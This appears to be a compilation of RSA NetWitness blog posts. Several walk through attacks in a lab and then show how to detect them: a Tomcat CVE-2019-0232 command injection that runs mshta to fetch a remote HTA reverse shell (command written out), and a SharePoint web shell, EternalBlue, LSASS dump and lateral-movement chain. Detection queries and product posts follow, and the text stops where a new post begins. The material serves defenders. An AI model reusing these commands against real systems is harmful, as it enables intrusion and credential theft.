Skip navigation
All Places > Products > RSA NetWitness Platform > Blog

What are LotL tactics?

Living-Off-The-Land tactics are those that involve the use of legitimate tools for malicious purposes. This is an old concept but a recent growing trend among threat actors because these types of techniques are very difficult to detect considering that the tools used are whitelisted most of the time. A good list of applications that can be used for these type of tactics can be found at LOLBAS (Windows) and GTFOBins (UNIX).

 

Intro

The first part of this article will show how an attacker is able to spot and exploit a recent RCE (Remote Code Execution) vulnerability for Apache Tomcat. We will see how the attacker will eventually be able to get a reverse shell using a legitimate Windows utility mshta.exe. The second part will focus on the detection phase leveraging the RSA NetWitness Platform.

 

Scenario

The attacker has targeted an organization we will call examplecorp throughout this blog post. During the enumeration phase, thanks to resources such as Google dorks, shodan.io and nmap, the attacker has discovered the company runs a Tomcat server which is exposed to the Internet. Upon further research, the attacker finds a vulnerability and successfully exploits it in order to obtain a reverse shell, which will serve as the foundation for his malicious campaign against examplecorp

 

To achieve what has been described in the above scenario the attacker uses different tools and services:

 

The scenario is simulated on a virtual local environment. Below is a list of the IP addresses used:

  • 192.168.16.123  --> attacker machine (Kali Linux)
  • 192.168.16.38    --> victim/examplecorp machine  (Windows host where Tomcat is running)
  • 192.168.16.146  --> remote server where the attacker stored the malicious payload (shell.hta)

 

Part 1 - Attack phase

With enumeration tools such as nmap, gobuster, etc., the attacker discovers that the Tomcat server is on version 9.0.17, it is running on Windows and it serves a legacy application through a CGI Servlet at the following address:

http://192.168.16.38:8080/cgi/app.bat

 

Hello World!

In our example the application will be as simple as "Hello, World!" but will be something else in reality.

 

Upon further research the attacker discovers a vulnerability (CVE-2019-0232) in the CGI Servlet component of Tomcat prior to version 9.0.18. A detailed description of the vulnerability can be found here at the following links:

 

With a simple test the attacker can verify the vulnerability. Just by adding ?&dir at the end of the URL the attacker can see the output of the dir command on the affected Windows server Tomcat is running on.

root@kali:~# curl "http://192.168.16.38:8080/cgi/app.bat?&dir"
Hello, World!
Volume in drive C has no label.
Volume Serial Number is 4033-77BA

Directory of C:\Program Files\Apache Software Foundation\Tomcat 9.0\webapps\ROOT\WEB-INF\cgi

19/12/2019  13:27    <DIR>          .
19/12/2019  13:27    <DIR>          ..
17/12/2019  15:00    <DIR>          %SystemDrive%
16/12/2019  21:37                67 app.bat
19/12/2019  13:19                21 hello.py
               2 File(s)             88 bytes
               3 Dir(s)  39,850,405,888 bytes free

 

Now the attacker decides to create a malicious payload that will spawn a remote shell. To do that, he uses a tool dubbed WeirdHTA that allows to create an obfuscated remote shell in hta format that he can then invoke remotely using the Microsoft mshta utility. The attacker tests the file with the most common anti virus software to ensure is properly obfuscated and not detected before initiating the attack.

 

 

The attacker launches the below command to connect to the remote server and run the malicious payload:

root@kali:~# curl -v "http://192.168.16.38:8080/cgi/app.bat?&C%3A%2FWindows%2FSystem32%2Fmshta.exe+http%3A%2F%2F192.168.16.146%3A8000%2Fshell.hta"
*   Trying 192.168.16.38:8080...
* TCP_NODELAY set
* Connected to 192.168.16.38 (192.168.16.38) port 8080 (#0)
> GET /cgi/app.bat?&C%3A%2FWindows%2FSystem32%2Fmshta.exe+http%3A%2F%2F192.168.16.146%3A8000%2Fshell.hta HTTP/1.1
> Host: 192.168.16.38:8080
> User-Agent: curl/7.66.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200
< Content-Type: text/plain
< Content-Length: 15
< Date: Fri, 31 Jan 2020 10:44:16 GMT
<
Hello, World!
* Connection #0 to host 192.168.16.38 left intact

 

If we break this command down we can see the following:

  1. curl -v "http://192.168.16.38:8080/cgi/app.bat
      The above is the URL of the Tomcat server where the CGI Servlet app (app.bat) resides
  2. ?&C%3A%2FWindows%2FSystem32%2Fmshta.exe+
      The second part is a URL-encoded string that decodes to C:\Windows\System32\mshta.exe
  3. http%3A%2F%2F192.168.16.146%3A8000%2Fshell.hta"
    This last part is the URL-encoded address of the remote location (http://192.168.16.123/shell.hta) where the attacker keeps the malicious payload, that is shell.hta.

 

The attacker, who had created a listener on his remote server, obtains the shell:

root@kali:~# nc -lvnp 7777
listening on [any] 7777 ...
connect to [192.168.16.123] from (UNKNOWN) [192.168.16.38] 50057
Client Connected...

PS C:\Program Files\Apache Software Foundation\Tomcat 9.0\webapps\ROOT\WEB-INF\cgi> dir


    Directory: C:\Program Files\Apache Software Foundation\Tomcat 9.0\webapps\ROOT\WEB-INF\cgi


Mode                LastWriteTime         Length Name                                                                 
----                -------------         ------ ----                                                                 
d-----       17/12/2019     15:00                %SystemDrive%                                                        
-a----       16/12/2019     21:37             67 app.bat                                                              
-a----       19/12/2019     13:19             21 hello.py                                                             


PS C:\Program Files\Apache Software Foundation\Tomcat 9.0\webapps\ROOT\WEB-INF\cgi>

 

Part 2 - Detection phase with the RSA NetWitness Platform

While investigating with RSA NetWitness Endpoint the analyst notices the Behaviors of Compromise meta key populated with the value runs mshta with http argument, which is unusual.

 

 

Filtering by the runs mshta with http argument indicator, the analyst observes that an application running on Tomcat is launching mshta which in turn is calling an hta file residing on a remote server (192.168.16.146).

 

 

Drilling into these sessions using the event analysis panel, the analyst is able to confirm the events in more detail:

  1. app.bat ( running on machine with hostname winEP1 and IP 192.168.16.38)
  2. created the process
  3. called mshta.exe
  4. mshta.exe runs with the parameter http://192.168.16.146:8000/shell.hta

 

The analyst, knowing the affected machine IP address, decides to dig deeper with the RSA NetWitness Platform using the network (i.e. packet) data.

 

  1. Investigating around the affected machine IP in the same time range, the analysts notices the IP address 192.168.16.123 (attacker) connecting to Tomcat on port 8080 (to test whether the server is vulnerable to CVE-2019-0232) by adding the dir command to the URL. He can also see the response.



  2. Immediately after the first event, the analyst notices the same IP address connecting on the same port but this time using a more complex GET request which seems to allude to malicious behavior.



  3. Now the analysts filters by ip.dst=192.168.16.146 (the IP address found in the GET request above) and he is able to see the content of the shell.hta file. Although it is encoded and not human-readable it is extremely suspicious!



  4. Next, the analysts filters by ip.dst=192.168.16.123 and he eventually sees that the attacker has obtained shell access (through PowerShell) to the windows machine where Tomcat resides.

 

Conclusion

LotL tactics are very effective and difficult to detect due to the legitimate nature of the tools used to perform such attacks. Constant monitoring and proactive threat hunting are vital for any organization. The RSA NetWitness Platform provides analysts with the visibility needed to detect such activities, thus reducing the risk of being compromised.

In this post we will cover CVE-2019-0604 (https://nvd.nist.gov/vuln/detail/CVE-2019-0604), albeit a somehwhat older vulnerability, it is one that is still being exploited. This post will also go a little further than just the initial exploitation of the Sharepoint server, and use EternalBlue to create a user on a remote endpoint to allow lateral movement with PAExec; again, this is an old, well-known vulnerability, but something still being used. We will then utilise Dumpert to dump the memory of LSASS (https://github.com/outflanknl/Dumpert) and obtain credentials, and then employ atexec from Impacket (https://github.com/SecureAuthCorp/impacket) to further laterally move.

 

The Attack

The initial foothold on the network is obtained is via the Sharepoint vulnerability (CVE-2019-0604). We will use the PoC code developed by Voulnet (https://github.com/Voulnet/desharialize) to drop a web shell:

 

In the above command we are targetting the vulnerable Picker.aspx page, and using cmd to echo a Base64 encoded web shell to a file in C:\ProgramData\ - we then use certutil to Base64 decode the file into a publicly accessible directory on the Sharepoint server and name it, bitreview.aspx.

 

To access the web shell we just dropped onto the Sharepoint server, we are going to use the administrative tool, AntSword (https://github.com/AntSwordProject/antSword). Here we add the URL to the web shell we dropped, and supply the associated password:

 

Now we can open a terminal and begin to execute commands on the server to get a lay of the land and find other endpoints to laterally move to:

 

The AntSword tool has a nice explorer view which allows us to easily upload additional tools to the server. In this instance we upload a scanner to check if an endpoint is vulnerable to EternalBlue:

 

Now we can iterate through some of the endpoints we uncovered earlier to see if any of them are vulerable to EternalBlue:

 

Now that we have uncovered a vulnerable endpoint, we can use this to create a user that will allow us to laterally move to it. Using the PoC code created by Worawit (https://github.com/worawit/MS17-010), we can exploit the endpoint and execute custom shellcode of our choosing. For this I compiled some shellcode to create a local administrative user called, helpdesk. I uploaded my shellcode and EternalBlue exploit executable and ran it against the vulnerable machine:

 

Now we have created a local administrative user on the endpoint, we can laterally move to it using those credentials. In this instance, we upload PAExec, and Dumpert, so we can laterally move to the endpoint and dump the memory of LSASS. The following command copies the and executes the Outflank-Dumpert.exe using PAExec and the helpdesk user we created via EternalBlue:

 

This tool will locally dump the memory of LSASS to C:\Windows\Temp - so we will mount one of the administrative shares on the endpoint, and confirm if our dump was successful:

 

Using AntSwords explorer, we can easily navigate to the file and download it locally:

 

We can then use Mimikatz on the attackers' local machine to dump the credentials which may help us laterally move to other endpoints:

 

We decide to upload the atexec tool from Impacket to execute commands on the remote endpoint to see if there are other machines we can laterally move to. Using some reconaissance commands, we find an RDP session using the username we pulled from the LSASS dump:

 

From here, we could continue to laterally move, dump credentials, and further own the network.

 

Detection using NetWitness Network

NetWitness doesn't always have to be used for threat hunting, it can also be used to search for things you know about, or have been currently researching. Taking the Sharepoint RCE as an example, we can easily search using NetWitness to see if any exploits have taken place. Given that this is a well documented CVE, we can start our searching by looking for requests to picker.aspx (filename = 'picker.aspx'), which is the vulnerable page - from the below we can see two GET requests, and a POST for Picker.aspx (inbound requests directly to this page are uncommon):

Next we can reconstruct the events to see if there is any useful information we can ascertain. Looking into the HTTP POST, we can see the URI matches what we would expect for this vulnerability, we also see that the POST parameter, ctl00$PlaceHolderDialogBodySection$ctl05$hiddenSpanData, contains the hex encoded and serialized .Net XML payload. The payload parameter also starts with two underscores which will ensure the payload reaches the XML deserialization function as is documented:

 

Seeing this would already warrant investigation on the Sharepoint server, but lets use some Python so we can take the hex encoded payload and deserialize it to see what was executed:

 

From this, we have the exact command that was run on the Sharepoint server that dropped a web shell. This also means we now know the name of the web shell and where it is located, making the next steps of investigation easier:

As analysts, it sometimes pays to do these things to find additional breadcrumbs to pull from, although be careful, as this can be time consuming and other methods can make it a lot easier, like MFT analysis that is described later on in the blog post.

 

This means we could search for this filename in NetWitness to see if we have any hits (filename = 'bitreview.aspx'):

 

As you can see from the above highlighted indicators, even without knowing the name of the web shell we would have still uncovered it as NetWitness created numerous meta values surrounding its usage. A fairly recent addition to the Lua parsers available on RSA Live is, fingerprint_minidump.lua - this parser creates the meta value, minidump, under the Filetype meta key, and also creates the meta value, lsass minidump, under the Indicators of Compromise meta key. This parser is a fantastic addition as it tags LSASS memory dumps traversing the network, which is uncommon behaviour.

 

Reconstructing the events, we can see the web shell traffic which looks strikingly similar to China Chopper. The User-Agent is also a great indicator for this traffic, which is the name of the tool used to connect to the web shell:

 

We can Base64 decode the commands from the HTTP POST's and get an insight into what was being executed. The below shows the initial POST which returns the current path, operating system, and username:

 

The following shows a directory listing of C:\ProgramData\ being executed, which is where the initial Base64 encoded bitreview.aspx web shell was dropped:

 

We should continue to Base64 decode all of these commands to gain a better understanding of what the attacker did, but for this blog post I will focus on the important pieces of the traffic. Pivoting into the Events view for the meta value, hex encoded executable, we can see the magic bytes for an executable that have been hex encoded:

 

Extracting all the hex starting from 4D5A (MZ header in hexadecimal) and decoding it with CyberChef, we can clearly see this is an executable. From here, we could save this file and perform further analysis on it:

 

Continuing on with Base64 decoding the commands we come across something interesting, it is the usage of a tool called eternalblue_exploit7.exe against an endpoint in the same network. This gives the defender additional information surrounding other endpoints of interest to the attacker and endpoint to focus on:

If you only have packet visibility, you should always decode every command. This will help you as a defender better understand the attackers actions and uncover additional breadcrumbs. But if you have NetWitness Endpoint, it may be easier to see the commands there, as we will see later.

 

Knowing EternalBlue uses SMB, we can pivot on all SMB traffic from the Sharepoint server to the targetted endpoint. Opening the Enablers of Compromise meta key we can see two meta values indicating the use of SMBv1; this is required for EternalBlue to work. There is also an meta value of not implemented under the Error meta key this is fairly uncommon and can help detect potential EternalBlue exploitation:

 

Reconstructing the events for the SMBv1 traffic, we come across a session that contains a large sequence of NULLs, this is the beginning of the EternalBlue exploit and these NULLs essentially move the SMB server state to a point where the vulnerability exists:

 

With most intrusions, there is typically some form of lateral movement that takes place using SMB. As a defender we should iterate through all possible lateral movement techniques, but for this example I want to see if PAExec has been used. To do this I use the following query (service = 139 && filename = 'svcctl' && filename contains 'paexe'). From the below, we can see that there is indeed some PAExec activity. By default, PAExec also includes the hostname of where the activity occured from, so from the below filenames, we can tell that this activity came from SP2016, the Sharepoint server. We can also see that a file was transferred, as is indicated by the paexec_move0.dat meta value - this is the Outflank-Dumpert.exe tool:

 

Back in the Investigation view, under the Indicators of Compromise meta key, we see a meta value of lsass minidump. Pivoting on this value, we see the dumpert.dmp file in the temp\ directory for the endpoint that was accessed over the ADMIN$ share - this is our LSASS minidump created using the Outflank-Dumpert.exe tool:

 

Navigating back to view all the SMB traffic, and focusing on named pipes (service = 139 && analysis.service = 'named pipe'), we can see a named pipe being used called atsvc. This named pipe gives access to the AT-Scheduler Service on an endpoint and can be used to scheduled tasks remotely. We can also see some .tmp files being created in the temp\ directory on this endpoint with what look like randomly generated names, and window cli admin commands associated with one of them:

 

Reconstructing the events for this traffic, we can see the scheduled tasks being created. In the below screenshot, we can see the XML and the associated parameters passed, in this instance using CMD to run netstat looking for RDP connections and output the results to %windir%\Temp\rWLePJvp.tmp:

 

This is lateral movement behaviour via Impackets tool, atexec. It writes the output of the command to a file so it can read it and display back to the attacker - further analysing the payload, we can see the output that was read from the file and gain insight into what the attacker was after, and subsequently endpoints to investigate:

 

 

Detection using NetWitness Endpoint

As always with NetWitness Endpoint, I like to start my hunting by opening the three compromise keys (IOC, BOC, and EOC). In this case, I only had meta values under the Behaviours of Compromise meta key. I have highlighted a few I deem more interesting with regards to this blog, but you should really investigate all of them:

 

Let's start with the runs certutil with decode arguments meta value. Opening this in the Events view, we can see the parameter that was executed, which is a Base64 encoded value being echo'ed to the C:\ProgramData\ directory, and then certutil being used to decode it and push it to a directory on the server:

 

From here, we could download the MFT of the endpoint:

 

Locate the file that was decoded, download it locally, and see what the contents are:

 

From the contents of the file, we can see that this is a web shell:

 

We also observed the attacker initially drop a file in the C:\ProgramData\ directory, so this is also a directory of interest and somewhere we should browse to within the MFT - here we uncover the attackers tools which we could download and analyse:

 

Navigating back to the Investigate view and opening the meta value http daemon runs command prompt in the Events view, we can see the HTTP daemon, w3wp.exe, executing reconaissance commands on the Sharepoint server:

This is a classic indicator for a web shell, whereby we have a HTTP daemon spawning CMD to execute commands.

 

Further analysis of the commands executed by the attacker shows EternalBlue executables being run against an endpoint, after this, the attacker uses PAExec with a user called helpdesk to connect to the endpoint - implying that the EternalBlue exploit created a user called helpdesk that allowed them to laterally move (NOTE: we will see how the user creation via this exploit looks a little later on):

 

Navigating back to Investigate, and this time opening the Events view for creates local user account, we see lsass.exe running net.exe to create a user account called, helpdesk; this is the EternalBlue exploit. LSASS should never create a user, this is a high fidelity indicator of malicious activity:

 

Another common attacker action is to dump credentials. Due to the popularity of Mimikatz, attackers are looking for other methods of dumping credentials, this typically involves creating a memory dump of the LSASS process. We can therefore use the following query (action = 'openosprocess' && filename.dst='lsass.exe'), and open the Filename Source meta key to look for something opening LSASS that stands out as anomalous. Here we can see a suspect executable opening LSASS named, Outflank-Dumpert.exe:

 

As defenders, we should continue to triage all of the meta values observed. But for this blog post, I feel we have demonstrated NetWitness' ability to detect these threats.

 

Detection Rules

The following table lists some application rules you can deploy to help with identifying these tools and behaviours:

Appliance

Description

Logic

Fiedlity

Packet Decoder

Requests of interest to Picker.aspx

service = 80 && action = ‘post’ && filename = 'picker.aspx' && directory contains '_layout'

Medium

Packet Decoder

AntSword tool usage

client begins 'antsword'

High

Packet Decoder

Possible Impacket atexec usage

service = 139 && analysis.service = 'named pipe' && filename = 'atsvc' && filename ends 'tmp'

Medium

Packet Decoder

Dumpert LSASS dump

fiilename = 'dumpert.dmp'

High

Packet Decoder

Possible EternalBlue exploit

service = 139 && error = 'not implemented' && eoc = 'smb v1 response'

Low

Packet Decoder

PAExec activity

service = 139 && filename = 'svcctl' && filename contains 'paexe'

 

High

Endpoint Log Hybrid

Opens OS process LSASS

action = 'openosprocess' && filename.dst='lsass.exe'

Low

Endpoint Log Hybrid

LSASS creates user

filename.src = ‘lsass.exe’ && filename’dst = ‘net.exe’ && param.dst contains’ /add’

High

 

Conclusion

Threat actors are consistently evolving and developing new attack methods, but they are also using tried and tested methods as well - there is no need for them to use a new exploit when a well-known one works just fine on an unpatched system. Defenders should not only be keeping up to date with the new, but also retroactively searching their data sets for the old.

Hi everyone!  In this video blog, I provide a demo of getting an 11.4 RSA NetWitness Platform full stack deployment within AWS. The demo deployment includes the following hosts:

  • NW Server
  • Network Hybrid
  • Health & Wellness Beta
  • Analyst UI

 

Please like or comment to let me know if this vblog was useful.

 

Mike

RSA NetWitness Platform - Product Manager

Visualization techniques can help an analyst make sense of a given data set by exposing scale, relationships, and features that would be almost impossible to derive by just looking at a list of individual data points.  As of RSA NetWitness Platform 11.4, we have added new physics and layout techniques to the nodal diagram in Respond in order to make better sense of the data both for when using Respond as an Incident/Case Management tool or when simply using Respond to group events and track non-case investigations (see Using Respond for Data Exploration for some ideas).

 

 

 

Clustering by Entity Type

Prior to 11.4, the nodal graph evenly distributed the nodes regardless of entity type (Host, IP, User, MAC, File). Improvements were made to introduce intelligent clustering such that entities of the same type not only retain their distinct color, but also have a higher chance of being clustered together.  This layout improvement makes it clearer to see relationships between different entity types, particularly when dealing with larger sets of data.

 

Variable Edge Forces Based on Relationship Type

Prior to 11.4, all edges between nodes were treated equally, resulting in lengths being rendered equally between all sets of connected nodes.  Improvements were made to adjust the relative attraction forces, helping to better distinguish attribute type relationships ("as", "is named", "belongs to", and "has file") from action type relationships ("calls", "communicates with", "uses").  Edges representing attributes will tend to be much shorter than those representing actions, which has the added benefit of reducing the number of overlapping edges, making relationships, scope, and sprawl much easier for an analyst to see at a glance.

 

 

Separation of Disconnected Clusters

Prior to 11.4, all nodes and edges were grouped into one large cluster, even if certain nodes in the data set did not have any relationship with others, requiring tedious manual dragging of nodes in order to distinguish the groupings.  Now, disjoint clusters of nodes are repelled from one another upon initial layout, making it extremely clear which sets of data are joined by some kind of relationship.  This is particularly helpful when using Respond for general data exploration of larger data sets (vs visualizing a single incident) that do not necessarily have commonality, both drawing the analysts eyes to potentially interesting outliers and once again reducing the number of overlapping edges that have historically made certain nodal graphs difficult to read, depending on the data set.


Improved Nodal Interaction

In addition to the physics governing new layouts, improvements have been made to nodal interaction to help take advantage of them.  Given the potential size and complexity of data sets, despite the introduction of layout and force techniques, the layout may not always be optimal.  The goal was to improve interaction by minimizing the number of graph drags needed by an analyst to make sense of even the most tangled data sets.  When dragged, nodes with high connectivity will generally attract other nodes with which a relationship exists.  Also, once any node is manually dragged into position, manipulating the position of other nodes will no longer impart a moving force, meaning the original dragged node will stay in place.  To "unpin" dragged nodes and have them spring back into place, simply double click.

 

 

As always, if you have any feedback or suggestions on how to make this experience even better, please leave a comment or, better yet, search, submit, and vote on product enhancements on the RSA Ideas portal: RSA Ideas for the RSA NetWitness Platform 

 

Happy Hunting!

Did you know that you can use Respond for data exploration, even if you aren't using it for Incident Management?  While the naming convention certainly does not suggest it, Respond can be just as useful outside of incident response a place for analysts to group events of interest during investigation and hunting efforts.    Using Respond as more of an analyst workspace can help teams collaborate better, track streams of thought, and take advantage of Respond's new and improved visualization capabilities as of 11.4 (see Visualization Enhancements in RSA NetWitness Platform 11.4  for details).  

 

 

 

Step 1 - Create an "Incident" from Events view

Once you have a set of data that carries significance, you can select any set or subset of events contained in a data set and use it to create a new "Incident".  For our purposes here, you'll have to look past the current naming conventions of Alerts and Incidents and just think of it as a grouping of events (log, endpoint, or network sessions).

 

What data sets to use is largely up to you, but this type of approach is particularly useful when following a methodology that requires systematically carving larger data sets into smaller, more manageable ones.  The example above is based on RSA's Network Hunting Guide, details of which can be found here: RSA NetWitness Hunting Guide 

 

Step 2 - Open in Respond

Once opened, all of the capabilities available when using Respond for Incident Management are available.  It doesn't mean you have to use all of them, but you may find some of them to be a handy way to tag in other analysis (Tasks) and keep track of your analysis (Journal).  And if you do happen to find something malicious in the data set, all of the relevant information is already contained.

 

In the example above, we're seeing if anything interesting shows up in the data set for "All outbound HTTP sessions using the POST method".  The nodal diagram can be a useful way to see how the data is distributed between entities (larger bubbles meaning a larger number of events), which sub data sets within the larger one are dealing with disjoint sets of entities (Files, Hosts, IPs, Users, MAC Addresses), and can key your eye towards groupings that lead to deeper levels of inspection.  

 

Step 3 - Use Respond Tools to Track, Pivot, and Collaborate


View Event Cards


In-line Event Reconstruction (eg. Network Reconstruction)


Entity Details - Pivot To Other Views 

 

Collaboration

Add New Events 

And don't forget that you can always add more events to the same Respond incident to expand investigation if more leads are uncovered. Simply start from the top, and "Add To Incident".

 

As always, if you have any feedback or suggestions on how to make this experience even better, please leave a comment or, better yet, search, submit, and vote on product enhancements on the RSA Ideas portal: RSA Ideas for the RSA NetWitness Platform 

 

Happy Hunting!

The newest version of the RSA NetWitness Platform is almost here!

 

We’re excited to release the 11.4 version of the RSA NetWitness Platform very soon. We’ve worked hard on many new features and enhancements that will help users detect, investigate, and understand threats in their organizations.

 

This version introduces new features in analyst investigation, UEBA, Respond, administrative functions, and RSA NetWitness Endpoint, that collectively make security teams more efficient and arm them with the most relevant and actionable security data. Some of the more noteworthy 11.4 features include:

 

  • Enhanced Investigation Capabilities: Fully integrated free-text search, auto-suggestion, & search profiles
  • Smarter Network Threat & Anomaly Detection: UEBA expanded to analyze packet data with 24 new indicators
  • Improved Visualization of Incidents: Respond visualizations are clearer with enhanced relationship mapping
  • Expanded Functions for Endpoint Response: Powerful Host forensic actions and dynamic analysis directly from the RSA NetWitness Platform
  • Simplified File Collection from Endpoint Agents
  • Single Sign-on Capability
  • Distributed Analyst User Interfaces
  • New Health and Wellness (BETA)


This is not an exhaustive list of all the changes, please see the Release Documentation for the nitty gritty of the release details and to understand the full list of all the changes we’ve made in this release.

 

In the coming days and weeks, we’ll be publishing additional blog entries that demonstrate how this new functionality operates, and the benefits customers can expect to realize in 11.4.

 

The RSA Product team is excited for you to try this new release!

HA is a common need in many enterprise architectures, so NetWitness Endpoint has some built-in capabilities that allow organizations to achieve a HA setup with fairly minimal configuration and implementation needs.

 

An overview of the setup:

  1. Install Primary and Alternate Endpoint Log Hybrids (ELH)
  2. Create a DNS CNAME record pointing to your Primary ELH
  3. Create Endpoint Policies with the CNAME record's alias value

 

The failover procedure:

  1. Change the CNAME record to point to the Alternate ELH

 

And the failback procedure:

  1. Change the CNAME record back to the Primary ELH

 

To start, you'll need to have an ELH already installed and orchestrated within your environment.  We'll assume this is your Primary ELH, where your endpoint agents will ordinarily be checking into, and what you need to have an alternate for in the event of a failure (hardware breaks, datacenter loses power, region-wide catastrophic event...whatever).

 

To install your Alternate ELH (where your endpoint agents should failover to) you'll need to follow the instructions here: https://community.rsa.com/docs/DOC-101660#NetWitne  under "Task 3 - Configuring Multiple Endpoint Log Hybrid".

**Make sure that you follow these instructions exactly...I did not the first time I set this up in my lab, and so of course my Alternate ELH did not function properly in my NetWitness environment...**

 

Once you have your Alternate ELH fully installed and orchestrated, your next step will be to create a DNS CNAME record.  This alias will be the key to entire HA implementation.  You'll want to point the record to your Primary ELH; e.g.: 

 

**Be aware that Windows DNS defaults to a 60 minute TTL...this will directly impact how quickly your endpoint agents will point to the Target Host FQDN in the CNAME record, so if 60 minutes is too long to wait for endpoints to be available during a failover you might want to consider setting the TTL lower...** (props to John Snider for helping me identify this in my lab during my testing)

 

And your last step in the initial setup will be to create Endpoint Policies that use this alias value.  In the NetWitness UI, navigate to Admin/Endpoint Sources/Policies and either modify an existing EDR policy (the Default, for instance) or create a new EDR policy.  The relevant configuration option in the EDR policy setting is the "Endpoint Server" option within the "Endpoint Server Settings" section:

 

When editing this option in the Policy, you'll want to choose your Primary ELH in the "Endpoint Server" dropdown and (the most important part) enter the CNAME record's alias as the "Server Alias":

 

Add and/or modify any additional policy settings as required for your organization and NetWitness environment, and when complete be sure to Publish your changes. (Guide to configuring Endpoint Groups and Policies here: NetWitness Endpoint Configuration Guide for RSA NetWitness Platform 11.x - Table of Contents)

 

You can test your setup and environment by running some nslookup commands from endpoints within your environment to check that your DNS CNAME is working properly and endpoints are resolving the alias to the correct target (Primary ELH at this point), as well as creating an Endpoint EDR Policy to point some active endpoint agents to the Alternate ELH (**this check is rather important, as it will help you confirm that your Alternate ELH is installed, orchestrated, and configured correctly**).

 

Prior to moving on to the next step, ensure that all your agents have received the "Updated" Policy - if any show in the UI with a "Pending" status after you've made these changes, then that means they have not yet updated:

 

Assuming all your tests come back positive and all your agents' policies are showing "Updated", you can now simulate a failure to validate that your setup is, indeed, HA-capable. This can be quite simple, and the failover process similarly straightforward.

 

  1. Shutdown the Primary ELH
  2. Modify the DNS CNAME record to point to the Secondary ELH
    1. This is where the TTL value will become important...the longer the TTL the longer it may take your endpoints to change over to the Alternate ELH
    2. Also...there is no need to change the existing Endpoint Policy, as the Server Alias you already entered will ensure your endpoints
  3. Confirm that you see endpoints talking to the Alternate ELH
    1. Run tcpdump on the Alternate ELH to check for incoming UDP and TCP packets from endpoints
    2. See hosts showing up in the UI
    3. Investigate hosts

 

After Steps 1 and 2 are complete, you can confirm that agents are communicating with the Alternate ELH by running tcpdump on that Alternate ELH to look for the UDP check-ins as well as the TCP tracking/scan data uploads:

 

...as well as confirm in the UI that you can see and investigate hosts:

 

 

Once your validation and testing is complete, you can simply revert the procedure by powering on the Primary ELH, powering off the Alternate ELH, and modifying the CNAME record to point back to the Primary ELH.

 

Of course, during an actual failure event, your only action to ensure HA of NetWitness Endpoint would be to change the CNAME record, so be sure to have a procedure in place for an emergency change control, if necessary in your organization.

A couple of months ago, Mr-Un1k0d3r released a lateral movement tool that solely relies on DCE/RPC (https://github.com/Mr-Un1k0d3r/SCShell). This tool does not create a service and drop a file like PsExec or similar tools would do, but instead uses the ChangeServiceConfigA function (and others) to edit an existing service and have it execute commands; making this a fileless lateral movement tool.

 

SCShell is not a tool designed to provide a remote semi-interactive shell. It is designed to allow the remote execution of commands on an endpoint utilising only DCE/RPC in an attempt to evade common detection mechanisms; while this tool is slightly stealthier than most in this category, it’s also a bit more limited in what an attacker can do with it.

 

When we first looked at this, we didn't have much in terms of detection, but with a prompt response from William Motley from our content team, he produced an update to the DCERPC parser that is the basis of this post.

 

The Attack

In the example screenshot below, I run the SCShell binary against an endpoint to launch calc.exe, while this is of no use to an attacker, it is just an example that we can use to visually confirm the success of the attack on the victim machine:

 

 

It could also be used to launch a Metasploit reverse shell, for example, as shown in the screenshot below. We will cover some of the interesting artifacts leftover from this execution in a seperate post. Obviously, this is not something an attacker would do, in their case something like launching an additional remote access trojan or tool would be more likely:

 

SCShell edits an existing service on the target endpoint, it does not create a new one. Therefore the service needs to already exist on the target. In the above example, I use defragsvc as it is a common service on Windows endpoints.

 

RSA NetWitness Network Analysis

There was a recent update to the DCERPC parser that is available via RSA NetWitness Live (thanks to Bill Motley), this parser now extracts the API calls made over DCE/RPC - which can be useful in detecting suspect activity over this protocol. If you have setup your subscriptions correctly for this parser (which you should have), it will be updated automatically, otherwise you will have to push it manually.

 

So, to start my investigation (as per usual) I take a look at my compromise meta keys and notice a meta value of, remote service control, under the Indicators of Compromise [ioc]

 meta key. This is an area that should be regularly explored to look for anomalous activity:

 

Pivoting on this meta value and opening up the action and filename meta keys, we can see the interaction with the svcctl interface that is being used to call API functions to query, change, and start an existing service:

 

 

  • StartServiceA - Starts a Service
  • QueryServiceConfigA - Retrieves the configuration parameters of the specified service.
  • OpenServiceAOpens an existing service
  • OpenSCManagerWEstablishes a connection to the service control manager on the specified computer and opens the specified service control manager database
  • ChangeServiceConfigAChanges the configuration parameters of a service

 

The traffic sent over DCE/RPC is encrypted, so reconstructing the sessions will not help here, but given that we have full visibility we can quickly pivot to endpoint data to get the answers we need. The following logic would allow you to identify this remote service modification behaviour taking place in your environment and subsequently the endpoints of interest for investigation:

service = 139 && filename = 'svcctl' && action = 'openservicea' && action = 'changeserviceconfiga' && action = 'startservicea'

 

RSA NetWitness Endpoint Analysis

A great way to perform threat hunting on a dataset is by performing frequency analysis, this allows us to bubble up outliers and locate suspect behaviour with respect to your environment - an anomaly in one environment, can be common in another. This could be done by looking for less common exectuables being spawned by services.exe in this instance - the following query would be a good place to start, device.type='nwendpoint' && filename.src='services.exe' && action='createprocess' - we would then open up the Filename Destination meta key and see a large number of results returned:

 

 

Typically, we tend to view the results from our queries in descending order, in this instance, we want to see the least common, so we switch the sorting to ascending to bubble up the anomalous executables. Now we can analyse the results and as shown in the screenshot below, we see a couple of interesting outliers, the calc.exe, and the cmd.exe:

 

 

Pivoting into the Events view for cmd.exe, we can see it using mshta to pull a .hta file, clearly this is not good:

 

 

This activity whereby services.exe spawns a command shell is out of the box content, and can be found under the Behaviors of Compromise [boc] meta key, so this would also be a great way to start an investigation as well:

 

 

Now that we have suspect binaries of interest, we have files and endpoints we could perform further analysis on to get our investigation fully underway, but for this post I will leave it here.

 

Conclusion

It is important to ensure that all your content in NetWitness is kept up to date - automating your subscriptions to Lua parsers for example, is a great start. It ensures that you have all the latest metadata being created from the protocols, and improves your ability as a defender to hunt and find malicious behaviours.

 

It is also important to remember that while sometimes there may not be a lot of activity from the initial execution of say a binary, at some point, it will have to perform some activity in order to achieve its end goal. Picking up on said activity will allow defenders to pull the thread back to the originating malicious event.

DNS over HTTPS (DoH) was introduced to increase privacy and help prevent against the manipulation of DNS data by utilising HTTPS to encrypt it. Mozilla and Google have been testing versions of DoH since June 2018, and have already begun to roll it out to end-users via their browsers, Firefox, Mozilla, and Chrome. With the adoption rates of DoH increasing, and the fact that C2 frameworks using DoH have been available since October 2018, DoH has become an area of interest for defenders; one C2 that stands out is goDoH by SensePost (https://github.com/sensepost/goDoH).

 

goDoH is a proof of concept Command and Control framework written in Golang that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google and Cloudflare, but it also contains the ability to use traditional DNS.

 

The Attack

